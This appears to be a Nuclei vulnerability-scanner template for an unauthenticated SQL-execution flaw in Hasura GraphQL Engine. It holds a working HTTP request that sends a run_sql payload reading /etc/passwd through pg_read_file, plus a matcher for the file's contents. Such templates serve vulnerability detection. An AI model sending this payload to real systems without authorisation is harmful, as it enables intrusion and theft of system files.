id: hasura-graphql-psql-exec info: name: Hasura GraphQL Engine - Remote Code Execution author: Udyz severity: critical description: Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint (aka remote code execution). reference: - https://www.exploit-db.com/exploits/49802 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 tags: graphql,edb,hasura,rce metadata: max-request: 1 http: - raw: - | POST /v2/query HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "type": "bulk", "source": "default", "args":[ { "type": "run_sql", "args": { "source":"default", "sql":"SELECT pg_read_file('/etc/passwd',0,100000);", "cascade": false, "read_only": false } } ] } matchers: - type: regex regex: - "root:.*:0:0:" part: body